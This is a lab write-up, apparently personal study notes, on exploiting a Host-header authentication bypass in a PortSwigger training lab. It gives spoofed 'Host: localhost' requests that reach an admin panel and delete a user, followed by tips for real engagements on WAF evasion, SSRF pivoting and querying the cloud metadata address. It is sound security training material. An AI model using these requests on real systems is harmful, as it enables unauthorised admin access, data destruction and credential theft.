[This lab makes](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass) an assumption about the privilege level of the user based on the HTTP Host header. 1. **Identify Host header control** * Send `GET /` in Burp Repeater. * Modify `Host:` to random value — still returns **200** → Host header not validated. ![[CleanShot 2025-08-12 at [email protected]]] 1. **Locate hidden admin panel** * Check `/robots.txt` → reveals `/admin`. ![[CleanShot 2025-08-12 at [email protected]]] 1. **Test privilege condition** * Direct `GET /admin` → access denied. * Error says: *only accessible to local users*. 4. **Bypass via Host header spoofing** * In Burp Repeater: ``` GET /admin HTTP/1.1 Host: localhost ``` * Response: Admin panel accessible. ![[CleanShot 2025-08-12 at [email protected]]] 5. **Exploit admin function** * Change request line: ``` GET /admin/delete?username=carlos HTTP/1.1 Host: localhost ``` * Send → user deleted → lab solved. --- #### Tricks for Real-World Engagements * **Automated detection:** * In Burp, create a match/replace rule to inject `Host: localhost` into all requests, watch for access changes. * **Bypass WAFs:** * Use alternative Host header casing (`HoSt:`), multiple Host headers, or add `X-Forwarded-Host: localhost` for load balancer trickery. * **Pivoting:** * Combine with SSRF — use the poisoned Host header to force backend service-to-service calls. * **Enumeration:** * Swap `localhost` for `127.0.0.1`, `::1`, internal hostnames, or AWS metadata IP (`169.254.169.254`) for extra data leakage.